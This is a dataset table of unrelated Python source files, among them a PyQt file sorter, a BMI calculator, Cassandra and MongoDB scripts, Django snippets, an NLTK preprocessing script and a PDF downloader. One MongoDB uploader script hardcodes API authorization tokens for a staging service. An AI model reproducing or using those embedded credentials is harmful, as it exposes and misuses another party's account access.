text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lisa.py
#
# Copyright 2015 Arkadiy <arkadiy@arkadiy-SVE1511T1RW>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import os
import shutil
import time
import sys
from windows import Ui_MainWindow
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
import res
class Lisa_win(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.setStyleSheet(open('style.qss').read())
self.open_btn.clicked.connect(self.showDialog)
self.actionOpen_Dir.triggered.connect(self.showDialog)
self.actionExit.triggered.connect(exit)
self.action_2.triggered.connect(self.help)
self.actionAbout.triggered.connect(self.about)
self.start_btn.clicked.connect(self.sorted)
self.month_chb.setVisible(0)
self.year_chb.setVisible(0)
# self.date_rb.clicked.connect(self.show_options)
# self.extens_rb.clicked.connect(self.show_options)
def showDialog(self):
try:
self.progress_pg.setValue(0)
dir_name = QFileDialog.getExistingDirectory(
self, 'Open file')
list_files = os.listdir(dir_name)
self.dir_name_le.setText(dir_name)
self.list_files_lw.clear()
for i in list_files:
item = QListWidgetItem(i)
if os.path.isdir(os.path.join(dir_name, i)):
item.setIcon(QIcon(':/icons/icons/folder.png'))
if os.path.isfile(os.path.join(dir_name, i)):
item.setIcon(QIcon(':/icons/icons/file.png'))
self.list_files_lw.addItem(item)
except:
pass
def show_options(self):
if self.date_rb.isChecked():
self.month_chb.setVisible(1)
self.year_chb.setVisible(1)
else:
self.month_chb.setVisible(0)
self.year_chb.setVisible(0)
def sorted(self):
if self.extens_rb.isChecked() or self.date_rb.isChecked():
self.list_files_lw.clear()
directory = self.dir_name_le.text()
self.start_btn.setEnabled(0)
if directory:
files = os.listdir(directory)
step_pb = 100 / len(files)
if self.extens_rb.isChecked():
self.sort_by_ext(directory, files, step_pb)
elif self.date_rb.isChecked():
self.sort_by_date(directory, files, step_pb)
self.progress_pg.setValue(100)
self.finish()
else:
QMessageBox.question(
self, 'Message', "Please select directory to sort", QMessageBox.Ok)
else:
QMessageBox.question(
self, 'Message', "Please select type sort", QMessageBox.Ok)
def finish(self):
self.start_btn.setEnabled(1)
QMessageBox.question(self, 'Message',
"All files by sorted", QMessageBox.Ok)
def help(self):
QMessageBox.question(
self, 'Help', 'This programm written Python3. Sorted your files in directory by date or extension.\nSorted by date: /home/user/downloads ==> /home/user/downloads/years/month\nExample: /home/user/download/2015/July\nType sorted extension: /home/user/downloads/pdf', QMessageBox.Ok)
def about(self):
QMessageBox.question(
self, 'About author', 'This is GUI interface for Lisa - Programm sorted your files\nAuthor: Khorark\nEmail: khorark@gmail.com\nVerion: 1.01 - 2016.03.10', QMessageBox.Ok)
def sort_by_ext(self, directory, files, step_pb):
for i in files:
ext = os.path.splitext(i)
if ext[1] != '':
dst_dir = os.path.join(directory, ext[1][1:])
if os.path.exists(dst_dir) == False:
os.mkdir(dst_dir)
shutil.move(os.path.join(directory, i),
os.path.join(dst_dir, i))
print('{} ==> {}'.format(os.path.join(
directory, i), os.path.join(dst_dir, i)))
self.list_files_lw.addItem('{} ==> {}'.format(os.path.join(
directory, i), os.path.join(dst_dir, i)))
self.progress_pg.setValue(
self.progress_pg.value() + step_pb)
def sort_by_date(self, directory, files, step_pb):
for i in files:
abs_path = os.path.join(directory, i)
if os.path.isdir(abs_path) == False:
acc_time = time.gmtime(os.path.getmtime(abs_path))
file_time_year = time.strftime('%Y', acc_time)
file_time_month = time.strftime('%B', acc_time)
dst_dir_year = os.path.join(directory, file_time_year)
dst_dir_month = os.path.join(dst_dir_year, file_time_month)
if os.path.exists(dst_dir_year) == False:
os.mkdir(dst_dir_year)
if os.path.exists(dst_dir_month) == False:
os.mkdir(dst_dir_month)
shutil.move(os.path.join(directory, i),
os.path.join(dst_dir_month, i))
print('{} ==> {}'.format(
abs_path, os.path.join(dst_dir_month, i)))
self.list_files_lw.addItem('{} ==> {}'.format(
abs_path, os.path.join(dst_dir_month, i)))
self.progress_pg.setValue(
self.progress_pg.value() + step_pb)
def sort_by_year(self, directory, files, step_pb):
pass
def sort_by_month(self, directory, files, step_pb):
pass
if __name__ == '__main__':
app = QApplication([])
w = Lisa_win()
w.show()
app.exec_()
|
#Author: Emil
#Description: Body Mass Index Calculator using Imperial system
print("Hello, welcome to your Body Mass Index(BMI) Calculator!\n")
while True:
try:
height = float(input("Please enter your height here in inches: "))
break
except ValueError: #making sure user entered number correctly
print("Enter a valid positive number please")
while True:
try:
weight = float(input("Please enter your weight here in pounds: "))
break
except ValueError:
print("Enter a valid positive number please")
healthy = False #to provide them relevant articles based on if they are healthy or not
bmi = weight/(height**2) * 703 #body mass index equation for imperial system
bmi = round(bmi, 2) #rounds our bmi value to 2 decimal places
print("Your Body Mass Index is: ", bmi)
if(bmi<=16):
print("You're Severely Underweight")
elif(bmi<=18.5):
print("You're Underweight")
elif(bmi<=25):
print("You're Healthy!")
healthy = True
elif(bmi<=30):
print("You're Overweight")
else:
print("You're Severely Overweight")
print("\nWhat's next? Check out these resources provided by the CDC and NIH for achieving that healthy lifestyle!\n")
if healthy == True: #if user is in a healthy bmi, we'll provide links about maintaing that
print("Maintaing that healthy weight: ")
print("-> https://www.cdc.gov/healthyweight/prevention/index.html")
print("-> https://www.nhlbi.nih.gov/heart-truth/maintain-a-healthy-weight")
else: #if user is underweight or overweight, we'll provide resources on steps for them to try
print("-> Achieving that Healthy Weight:https://www.cdc.gov/healthyweight/index.html")
print("-> Physical Activity: https://www.nhlbi.nih.gov/heart-truth/increase-physical-activity")
print("-> Healthy diet: https://www.nhlbi.nih.gov/heart-truth/eat-a-heart-healthy-diet")
print()
|
import cassandra
from cassandra.cluster import Cluster
try:
cluster = Cluster(['127.0.0.1']) #If you have a locally installed Apache Cassandra instance
session = cluster.connect()
except Exception as e:
print(e)
try:
session.execute("""
CREATE KEYSPACE IF NOT EXISTS php_compute
WITH REPLICATION =
{ 'class' : 'SimpleStrategy', 'replication_factor' : 1 }"""
)
except Exception as e:
print(e)
try:
session.set_keyspace('php_compute')
except Exception as e:
print(e)
query = "CREATE TABLE IF NOT EXISTS music_php "
query = query + "(song_title text, artist_name text, year int, album_name text, single int, PRIMARY KEY (year, artist_name))"
try:
session.execute(query)
except Exception as e:
print(e)
query = "insert into music_php (song_title, artist_name, year, single, album_name)"
query = query + " VALUES (%s, %s, %s, %s, %s)"
try:
session.execute(query, ("Across The Universe", "The Beatles", 1970, 0, "Let It Be"))
except Exception as e:
print(e)
try:
session.execute(query, ("Think For Yourself", "The Beatles", 1965, 0, "Rubber Soul"))
except Exception as e:
print(e)
query = 'SELECT * FROM music_php'
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print (row.year, row.album_name, row.artist_name)
query = 'select * from songs WHERE YEAR=1970 AND artist_name="The Beatles"'
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print (row.year, row.album_name, row.artist_name)
session.shutdown()
cluster.shutdown()
# |
from pymongo import MongoClient
import requests
import time
client = MongoClient('mongodb://localhost/', 27017)
DATABASE = client.mvp
lst = ['contracts','marketing', 'warranties', 'business_planning', 'conferences', 'computers', 'office_technology','electronics', 'regulations', 'correspondence',
'computers', 'shopping', 'marketing', 'inventory', 'storage', 'hiring_and_training']
def get_document(table,query,order=None,distinct=None,page=None,limit=None,incre=-1):
if page:
if not limit:
limit = 20
page = int(page)
limit = int(limit)
if order:
res = DATABASE[table].find(query).sort(order, incre).skip((page-1)*limit).limit(limit)
else:
res = DATABASE[table].find(query).skip((page-1)*limit).limit(limit)
else:
if order:
res = DATABASE[table].find(query).sort(order, incre)
else:
res = DATABASE[table].find(query)
if distinct:
res = res.distinct(distinct)
res = filter(lambda r: r != '',res)
if res:
message = {"data": list(res)}
else:
message = {"data": []}
return message
def show_allcolection():
allcolec = []
for i in DATABASE.collection_names():
allcolec.append(i)
return allcolec
def create_topic():
# url = "http://127.0.0.1:8000/topics"
url = "https://toeic-essential-staging.herokuapp.com/topics"
headers = {
'Authorization': 'ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
}
for topic in lst:
param = {'topic': topic}
response = requests.post(url, data=param, headers=headers, timeout=17)
print(response)
time.sleep(1)
def create_words():
# url = "http://127.0.0.1:8000/words"
url = "https://toeic-essential-staging.herokuapp.com/words"
headers = {
'Authorization': 'ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
}
query = {}
# contrac = get_document('contracts', query)['data']
# print(contrac[-1])
for toipic in lst:
contrac = get_document(toipic, query)['data']
for word in contrac:
print(word['key'], word['value'])
param = {'word': word['key'],
'mean': word['value'],
'topic': toipic
}
response = requests.post(url, data=param, headers=headers, timeout=17)
print(response)
time.sleep(1)
# for topic in lst:
# param = {'topic': topic}
# response = requests.post(url, data=param, headers=headers, timeout=17)
# print(response)
def create_topic():
# url = "http://127.0.0.1:8000/topics"
url = "https://toeic-essential-staging.herokuapp.com/topics"
headers = {
'Authorization': 'Token ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
}
query = {}
contrac = get_document('contracts', query)['data']
# print(contrac[-1])
for toipic in lst:
param = {'level': 10,
'topic': toipic
}
response = requests.post(url, data=param, headers=headers, timeout=17)
print(response)
# time.sleep(1)
def get_all(table):
res = DATABASE[table].find()
res = filter(lambda r: r != '', res)
if res:
message = {"data": list(res)}
else:
message = {"data": []}
return message
def create_data():
url = "http://127.0.0.1:81/disable-drive"
headers = {
'Authorization': 'af4593ff029c48db8abc4363803278da',
'Content-Type': 'application/json'
}
data = {
'drive_id': drive_id
}
response = requests.post(url, data=data, headers=headers, timeout=7)
query = {}
for word in get_document(get_document('contracts', query)):
print(word)
def create_words():
url = "https://toeic-essential-staging.herokuapp.com/words"
headers = {
'Authorization': 'Token ec8f40cd6b7106f59475ff0a5f72e29c6dfc19b5'
}
query = {}
contrac = get_document('contracts', query)['data']
print(contrac[-1])
for toipic in lst:
for word in contrac:
print(word['key'], word['value'])
param = {'word': word['key'],
'mean': word['value'],
'topic': toipic
}
response = requests.post(url, data=param, headers=headers, timeout=17)
print(response)
time.sleep(1)
# for topic in lst:
# param = {'topic': topic}
# response = requests.post(url, data=param, headers=headers, timeout=17)
# print(response)
if __name__ == '__main__':
# create_data()
# print(show_allcolection())
# query = {}
# print(get_document('contracts', query)['data'])
# print(create_topic())
print(create_words())
|
from django.contrib import admin
from models import Artist, Art
admin.site.register(Artist)
class ArtAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',)}
admin.site.register(Art) |
import math
q = 0.9
def left(M, N):
term1 = (M - N + 0.5) * math.log(M / (M - N))
term2 = 1 / (12 * M + 1) - 1 / (12 * (M - N))
return term1 + term2
def right(N):
return N + math.log(q)
for i in range(65):
N = 2 ** i
j = i + 1
M = 2 ** j
while left(M, N) <= right(N):
print(left(M, N), right(N))
j += 1
M = 2 ** j
print(i, j)
|
from global_var import db
class Customer(db.Model):
__tablename__ = 'Customer'
username = db.Column(db.String(32), primary_key=True)
name = db.Column(db.String(32), nullable=False)
password = db.Column(db.String(128), nullable=False)
phone_number = db.Column(db.String(20), nullable=False)
age = db.Column(db.Integer)
gender = db.Column(db.String(20))
ID_number = db.Column(db.String(80), unique=True)
type = db.Column(db.String(20), default="NO-VIP")
|
### YOUR CODE HERE
# import tensorflow as tf
import torch
import os, argparse
import numpy as np
#from Model_SWA import MyModel
from Model import MyModel
from DataLoader import load_data, train_valid_split, load_testing_images
from Configure import model_configs, training_configs
import utils
parser = argparse.ArgumentParser()
parser.add_argument("mode", help="train, test or predict")
parser.add_argument("data_dir", help="path to the data")
parser.add_argument("--save_dir", help="path to save the results")
parser.add_argument("--resume_checkpoint", help=".pth checkpoint file to resume")
parser.add_argument("--checkpoint", help=".pth checkpoint file to use for evaluation")
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
if __name__ == '__main__':
model = MyModel(model_configs)
if args.mode == 'train':
print('----- training mode ----')
train,test,orig_trainset = load_data(args.data_dir,train_aug=training_configs['train_augmentation']) # augment the train data with config
train,valid = train_valid_split(train,orig_trainset,train_ratio=1)
if args.resume_checkpoint is not None:
checkpoint = torch.load('../saved_models/' + args.resume_checkpoint)
epoch,accuracy_type,prev_accuracy = (checkpoint[k] for k in ['epoch','accuracy_type','accuracy'])
print('RESUME---> Loading model from Epoch %d with %s Accuracy %f' %(epoch,accuracy_type,prev_accuracy))
else:
checkpoint = None
model.train(train, training_configs,valid=None,test=test,checkpoint=checkpoint) # note test data is used only to evaluate model performance during training
model.evaluate(test)
elif args.mode == 'test':
# Testing on public testing dataset
_, test, _ = load_data(args.data_dir,None)
if args.checkpoint is not None:
checkpoint = torch.load('../saved_models/' + args.checkpoint)
print('Loading Model--->')
else:
raise('No Checkpoint file specified! Specify one with --checkpoint')
model.network.load_state_dict(checkpoint['net'])
test_accuracy, correct, total = model.evaluate(test)
print("[%s%s test results] Model Accuracy %f, Total Correctt %d, Total Test Samples %d" %(args.checkpoint,utils.get_time(),test_accuracy,correct,total))
elif args.mode == 'predict':
print('----- predict mode ----')
# Predicting and storing results on private testing dataset
x_test = load_testing_images(args.data_dir)
if args.checkpoint is not None:
checkpoint = torch.load('../saved_models/' + args.checkpoint)
print('Loading Model--->')
else:
raise('No Checkpoint file specified! Specify one with --checkpoint')
model.network.load_state_dict(checkpoint['net'])
predictions = model.predict_prob(x_test)
np.save( args.save_dir + args.checkpoint + "predictions.npy",predictions)
else:
print('[Error] No Mode Selected')
print('bye')
### END CODE HERE
|
INTERFACE_MACS = {
'eth0': 0x00e0ed0bdc2a,
'eth1': 0x00e0ed0bdc2b,
'eth2': 0x00e0ed0bdc2c,
'eth3': 0x00e0ed0bdc2d,
'eth6': 0x00e0ed11c7f7,
'eth7': 0x00e0ed11c7f6,
'eth8': 0x00e0ed11c7f5,
'eth9': 0x00e0ed11c7f4
}
RX_INTERFACE = 'eth7'
TX_INTERFACES = ['eth0', 'eth1', 'eth2', 'eth3', 'eth6', 'eth8', 'eth9']
MIRORRED_INTERFACES = ['eth0'] |
from matplotlib import pyplot
figure = pyplot.figure()
figure.clf()
pyplot.plot([1,2,3], [1,2,3])
pyplot.show() |
import logging
import os
import urllib.request, urllib.parse, urllib.error
import copy
from urllib.parse import urlparse
from django.conf import settings
LOGGER = logging.getLogger(__name__)
def get_jupyter_url(system, path, username, is_dir=False):
"""Translate file path and system to Jupyter URL
Requires PORTAL_JUPYTER_URL and PORTAL_JUPYTER_SYSTEM_MAP settings
Args:
system: agave system
path: file or directory path
username: current user
is_dir: True if path is a directory
Returns:
a Jupyter URL for viewing notebooks, editing text files or showing directory listings
"""
if username is None:
return None
portal_jupyter_url = getattr(settings, 'PORTAL_JUPYTER_URL', None)
portal_jupyter_system_map = getattr(settings, 'PORTAL_JUPYTER_SYSTEM_MAP', None)
if (portal_jupyter_url is None or portal_jupyter_system_map is None):
LOGGER.warning('No Jupyter URL or Jupyter System Map found.')
return None
# Have to make a storage system map -> jupyter mount point map with portal-home-{username} keys replaced
user_replace = lambda k : k.replace("{username}", username)
system_map = {
user_replace(k) : user_replace(v) for (k, v) in portal_jupyter_system_map.items()
}
# Check to see that the request file manager is configured to a Jupyter mount point
if system not in system_map:
LOGGER.warning(
'System \'%s\' not found in Jupyter System Map.',
system
)
return None
# Default action is to /edit a file
action = "/edit"
# If the filename ends with .ipynb, the action is to open as /notebooks
_ , ext = os.path.splitext(path)
if ext == ".ipynb":
action = "/notebooks"
if is_dir:
action = "/tree"
# Return URL string for file manager/filename
return "{portal_jupyter_url}/user/{username}{action}{system}{path}".format(
portal_jupyter_url=portal_jupyter_url,
username=username,
action=action,
system=system_map[system],
path=path
)
def url_parse_inputs(job):
"""
Translates the inputs of an Agave job to be URL encoded
"""
job = copy.deepcopy(job)
for key, value in job['inputs'].items():
# this could either be an array, or a string...
if isinstance(value, str):
parsed = urlparse(value)
if parsed.scheme:
job['inputs'][key] = '{}://{}{}'.format(
parsed.scheme, parsed.netloc, urllib.parse.quote(parsed.path))
else:
job['inputs'][key] = urllib.parse.quote(parsed.path)
else:
# If array, replace it with new array where each element was parsed
parsed_values = [ ]
for input in value:
parsed = urlparse(input)
input = '{}://{}{}'.format(
parsed.scheme, parsed.netloc, urllib.parse.quote(parsed.path))
parsed_values.append(input)
job['inputs'][key] = parsed_values
return job
|
# Création de la classe animal
class Animal:
def __init__(self, poids, taille) :
self.animal_taille = taille
self.animal_poids = poids
def se_deplacer(*args):
pass
# Création des sous classes Serpent et Oiseau
class Serpent(Animal) :
def se_deplacer(*args):
print("Je rampe")
# Utilisation de <super> pour modifier la fonction __init__ définie dans la classe Animal pour lui ajouter l'argument altitude_max
class Oiseau(Animal) :
def __init__ (self, poids, taille, altitude_max) :
super().__init__(poids,taille)
self.oiseau_altitude_max = altitude_max
def se_deplacer(*args):
print("Je vole")
y = 1000
aigle = Oiseau (12, 18, y)
print(aigle.oiseau_altitude_max)
|
import subprocess
import os, sys
import getopt
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
def common_clear(submodule_directory, version):
dr = submodule_directory
os.chdir(dr)
os.system("git checkout " + version)
os.chdir("..")
os.system('git add '+submodule_directory)
#os.system('git commit -m "moved ' + submodule_directory + ' to ' + version + '"')
#os.system('git push')
if __name__ == '__main__':
""" change commands and add shell"""
commands_kids = [
["git submodule add ssh://192.168.0.121:29418/~wusonglin/common_ts.git common", 'master'],
]
tag = 'kids'
try:
opt, args = getopt.getopt(sys.argv[1:], "ht:", ['tag', 'help'])
for op, value in opt:
if op in ("-t", "--tag"):
tag = value
if op in ("-h", "--help"):
print "Usage: GitSubmodule.py -t TAG_NAME"
print "Options:"
print " -t TAG_NAME.Choose what you want to use tag, should be [kids | nonkids],if no input args, kids is the default."
print ""
print "Sample 1: ./GitSubmodule.py -t kids"
print "Sample 2: ./GitSubmodule.py -t nonkids"
print ""
sys.exit()
except getopt.GetoptError:
print "Error: Could not find the args."
print "Usage: GitSubmodule.py -t TAG_NAME"
print "Options:"
print " -t TAG_NAME.Choose what you want to use tag, should be [kids | nonkids],if no input args, kids is the default."
print ""
print "Sample 1: ./GitSubmodule.py -t kids"
print "Sample 2: ./GitSubmodule.py -t nonkids"
print ""
sys.exit()
if tag.lower() in ['kids', 'nonkids']:
tag = tag.lower()
else:
print "Only one args must be 'kids' or 'nonkids'"
exit()
if tag == 'kids':
commands = commands_kids
else:
commands = commands_kids
print commands
for cmd in commands:
p = subprocess.Popen(cmd[0], stdout=subprocess.PIPE, env=os.environ, shell=True)
while True:
line = p.stdout.readline()
if not line:
break
print line
err = p.wait()
if err != 0:
print "error shell: ", cmd, "git submodule failed"
common_clear(cmd[0].split(' ')[-1], cmd[1]) |
import os
import sys
import getopt
from time import sleep
import io
import requests
import html
from urllib import parse
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
inputfile = "links2.txt"
outdir = "../data_monsanto/2018-03-29"
baseurl = "http://baumhedlundlaw.com/pdf/monsanto-documents/"
def usage(exitCode=0):
print('download.py [-i <infile>] [-o <outdir>] [-b <baseurl>] [-h]')
sys.exit(exitCode)
argv = sys.argv[1:] # first arg is filename
try:
opts, args = getopt.getopt(argv, "hi:o:b:", ["help", "inputfile=", "outdir=", "baseurl="])
except getopt.GetoptError:
usage(exitCode=2)
for opt, arg in opts:
if opt in ("-h", "--help"):
usage(exitCode=0)
elif opt in ("-i", "--inputfile"):
inputfile = arg
elif opt in ("-o", "--outdir"):
outdir = arg
elif opt in ("-b", "--baseurl"):
baseurl = arg
if len(baseurl) > 0 and baseurl[-1] != '/':
print("Warning, baseurl does not end with a '/', this is probably not what you want")
# f = io.open(inputfile, 'r', encoding='utf8')
# url = f.readline()
# url
# f.close()
notHandled = []
count = 0
with io.open(inputfile, 'r', encoding='utf8') as f:
for url in f:
url = url[:-1] # strip \n
if not url.endswith(".pdf"):
print("url was not for a pdf document: " + url)
notHandled.append(url)
continue
url = html.unescape(url) # convert html entities (&)
url = parse.unquote_plus(url) # convert url encoding (%20)
url = parse.urljoin(baseurl, url)
index = url.rfind("/") # reverse find
filename = os.path.join(outdir, url[index + 1:]) # index+1 works even if index=-1 :)
# filename becomes loaded with potential weird characters, probably a problem on windows
response = requests.get(url, headers=headers)
if response.status_code != 200:
raise Exception("wrong status_code {} ".format(response.status_code) + url)
with io.open(filename, 'wb') as outfile:
outfile.write(response.content)
count += 1
if count % 5 == 0:
print("{}".format(count))
sleep(0.75)
for url in notHandled:
print("Not downloaded: " + url)
print("Done. Downloaded {}".format(count))
|
# 树的子结构
# 输入两棵二叉树A,B,判断B是不是A的子结构。
class node:
def __init__(self, s):
self.s = s
self.left = None
self.right = None
def search(self, target):
if self.s == target.s:
if (target.right is None) & (target.left is None):
return 1
elif target.left is None:
return self.right.search(target.right)
elif target.right is None:
return self.left.search(target.left)
else:
return self.right.search(target.right) & self.left.search(target.left)
elif (self.left is None) & (self.right is None):
return 0
elif (self.left is not None) & (self.right is not None):
return self.left.search(target) | self.right.search(target)
elif self.left is None:
return self.right.search(target)
elif self.right is None:
return self.left.search(target)
else:
return 0
first = node('a')
second1 = node('b')
second2 = node('c')
second1.left = node('d')
second1.right = node('e')
second2.left = node('f')
second2.right = node('g')
first.right = second2
first.left = second1
test = node('c')
test.right = node('g')
test.left = node('f')
print(first.search(test))
|
from pygame import key, K_LEFT, K_RIGHT
from pygame.sprite import Group
from base import GameSprite
from constants import BULLET_IMG_PATH
class Player(GameSprite):
def __init__(self, window, img_path, sprite_x, sprite_y, size_x, size_y, player_speed):
super().__init__(window, img_path, sprite_x, sprite_y, size_x, size_y, player_speed)
self.size_x = size_x
self.bullets = Group()
def update(self):
keys_pressed = key.get_pressed()
if keys_pressed[K_LEFT] and self.rect.x > 5:
self.rect.x -= self.speed
if keys_pressed[K_RIGHT] and self.rect.x < self.window.get_size()[0] - self.size_x:
self.rect.x += self.speed
# Update bullets
self.bullets.draw(self.window)
self.bullets.update()
def fire(self):
bullet = Bullet(self.window, BULLET_IMG_PATH, self.rect.centerx, self.rect.top, 15, 20, -15)
self.bullets.add(bullet)
class Bullet(GameSprite):
def update(self):
self.rect.y += self.speed
if self.rect.y < 0:
self.kill()
|
__author__ = 'Cheng'
from django.conf.urls import patterns, url
import views
urlpatterns = patterns('',
# /pledges/
url(r'^$', views.index, name='index'),
url(r'^reward/list/$', views.list_rewards, name='list_rewards'),
url(r'^reward/collect/$', views.collect_reward, name='collect_reward'),
# /pledges/23
url(r'^(?P<pledge_id>\d+)/$', views.detail, name='detail'),
url(r'^follow/(?P<pledge_id>\d+)/$', views.follow, name='follow'),
url(r'^finish/(?P<pledge_id>\d+)/$', views.finish, name='finish'),
url(r'^success/(?P<pledge_id>\d+)/$', views.congrats, name='congrats'),
url(r'^already/(?P<pledge_id>\d+)/$', views.already, name='already'),
url(r'^share/(?P<pledge_id>\d+)/$', views.share, name='share'),
# /pledges/23/
url(r'^(?P<pledge_id>\d+)/results/$', views.results, name='results'),
url(r'^create_ajax/$', views.create_ajax, name='create_ajax'),
url(r'^paypal/$', views.get_paypal, name='paypal'),
)
|
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
def send_welcome_email(name,receiver):
#creating message subject and sender
subject = "Thanks for signing up to spy on your neighbours"
sender = 'egesacollins92@gmail.com'
#passing in the context variables
text_context = render_to_string('email/email.txt',{"name":name})
html_content = render_to_string('email/email.html',{"name":name})
msg = EmailMultiAlternatives(subject, text_context,sender,[receiver])
msg.attach_alternative(html_content, 'text/html')
msg.send() |
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 28 11:16:56 2020
@author: voide
"""
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import scipy.fftpack
df = pd.read_csv (r'acc_tri.csv', header=None)
acc_tri = df[0]
del df
y = acc_tri[2400000:2800000]
y = np.asarray(y)
Fs = 40000
T = 1 / Fs
# FFT
N = len(y)
yf = scipy.fftpack.fft(y)
xf = np.linspace(0.0, 1.0/(2.0*T), N//2)
fig = plt.figure(figsize=(30,5))
plt.plot(xf, 2.0/N * np.abs(yf[:N//2]))
plt.title('FFT')
plt.xlabel('Fréquence [Hz]')
plt.ylabel('Amplitude [-]')
# # Déterminer les 10 peak les plus importants
# freqmax_index = abs(np.argsort(-amp[:NFFT//2])[:10])
# freqmax = np.sort(freq[freqmax_index])[::-1]
|
import nltk
import random
import pickle
from nltk.tokenize import word_tokenize
short_pos = open("short_reviews/positive.txt","r").read()
short_neg = open("short_reviews/negative.txt","r").read()
all_words = []
documents = []
allowed_word_types = ["J"]
for p in short_pos.split('\n'):
documents.append( (p, "pos") )
words = word_tokenize(p)
pos = nltk.pos_tag(words)
for w in pos:
if w[1][0] in allowed_word_types:
all_words.append(w[0].lower())
for p in short_neg.split('\n'):
documents.append( (p, "neg") )
words = word_tokenize(p)
pos = nltk.pos_tag(words)
for w in pos:
if w[1][0] in allowed_word_types:
all_words.append(w[0].lower())
save_documents = open("pickled_algos/documents.pickle","wb")
pickle.dump(documents, save_documents)
save_documents.close()
all_words = nltk.FreqDist(all_words)
word_features = list(all_words.keys())[:2000]
save_word_features = open("pickled_algos/word_features5k.pickle","wb")
pickle.dump(word_features, save_word_features)
save_word_features.close()
def find_features(document):
words = word_tokenize(document)
features = {}
for w in word_features:
features[w] = (w in words)
return features
featuresets = [(find_features(rev), category)
for (rev, category) in documents]
random.shuffle(featuresets)
save_featuresets = open("pickled_algos/featuresets5k.pickle","wb")
pickle.dump(featuresets, save_featuresets)
save_featuresets.close()
print(len(featuresets))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: anchen
# @Date: 2017-07-03 23:24:13
# @Last Modified by: anchen
# @Last Modified time: 2017-08-12 12:52:22
from flask import current_app, render_template
from flask_mail import Message
from . import mail, celery, create_app
# 启动消息服务,在manager.py所在目录下启动
# celery -A manager.celery worker --loglevel=info
@celery.task(serializer='pickle')
def send_async_email(msg):
app = create_app('default' or 'development')
with app.app_context():
mail.send(msg)
def send_mail(to, subject, template, **kwargs):
# 这里调用send_email.delay()时参数如果报错对象不能json,那么可以使用如下几种方法:
# 1.
# @celery.task
# def send_async_email(message_details):
# with app.app_context():
# msg = Message(message_details['subject'],
# message_details['recipients'])
# msg.body = message_details['body']
# print type(msg)
# print dir(msg)
# print 'msg.send'
# print msg.send
# print 'msg'
# print msg
# mail.send(msg)
# 2.
# app.config.update(
# accept_content=['json','pickle']
# )
# then,
# @celery.task(serializer='pickle')
# def send_async_email(msg):
# pass
# 3.
# pip uninstall Flask-Mail
# pip install Flask-Mail==0.9.0
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['FLASKY_MAIL_SENDER'],
recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
send_async_email.delay(msg)
# 直接用多线程并发不高
# thr = Thread(target=send_async_email,args=(app,msg))
# thr.start()
|
######################################################
# this functions only purpose is to ask for and
# recieve user input
#####################################################
def user_input():
words = input("please enter a word or sentence :")
return words
######################################################
# this functions splits the sentences into manageble
# words
#####################################################
def word_editor(words):
word_list = words.rsplit(" ")
sentence = " "
for n in word_list:
temp = pig_latinor(n)
sentence = sentence + temp
return sentence
######################################################
# this functions takes a word and converts it to pig
# latin
#####################################################
def pig_latinor(word):
vowels_list = ["a","e","i","o","u","y"] # this list contains all the vowels
if word.isdigit(): # making sure the word isnt a number
word = word + " "
elif len(word) >1:
if (vowels_list.count(word[0]) == 0 and
vowels_list.count(word[1]) == 0):
# this is to make sure that words that start with th or sr retain proper pronunciation
temp_letter = word[:2]
word = word[2:]
else:
temp_letter = word[0]
word = word[1:]
word = word + " " + temp_letter + "ay "
else: # this deals with the single letter words
word = word + "ay "
return word
###############################################################
# this functions cleans up the displays the newly made sentence
###############################################################
def display(sentence):
sentence.strip()
print(sentence)
########################################################
# this is where it is all controlled
########################################################
users_sentence = user_input()
piglatin_sentence = word_editor(users_sentence)
display(piglatin_sentence) |
"""
Plugin that allows you to manage a python virtual env
## Requirements
- `pipenv`
- `pipenv-setup` if you want to run the `sync_setup` operation
"""
import argparse
import os
import confu.schema
import ctl
import ctl.config
from ctl.auth import expose
from ctl.docs import pymdgen_confu_types
from ctl.exceptions import UsageError
from ctl.plugins import command
try:
import pipenv_setup
except ImportError:
pipenv_setup = None
@pymdgen_confu_types()
class VenvPluginConfig(confu.schema.Schema):
"""
Configuration schema for `VenvPlugin`
"""
python_version = confu.schema.Str(choices=["2.7", "3.4", "3.5", "3.6", "3.7"])
pipfile = confu.schema.Str(help="path to Pipfile", default="{{ctx.home}}/Pipfile")
@ctl.plugin.register("venv")
class VenvPlugin(command.CommandPlugin):
"""
manage a virtual python envinronment
# Instanced Attributes
- binpath (`str`): path to venv `bin/` directory
"""
class ConfigSchema(ctl.plugins.PluginBase.ConfigSchema):
config = VenvPluginConfig()
description = "manage a virtualenv using venv"
@classmethod
def add_arguments(cls, parser, plugin_config, confu_cli_args):
install_parser = argparse.ArgumentParser(add_help=False)
group = install_parser.add_mutually_exclusive_group(required=False)
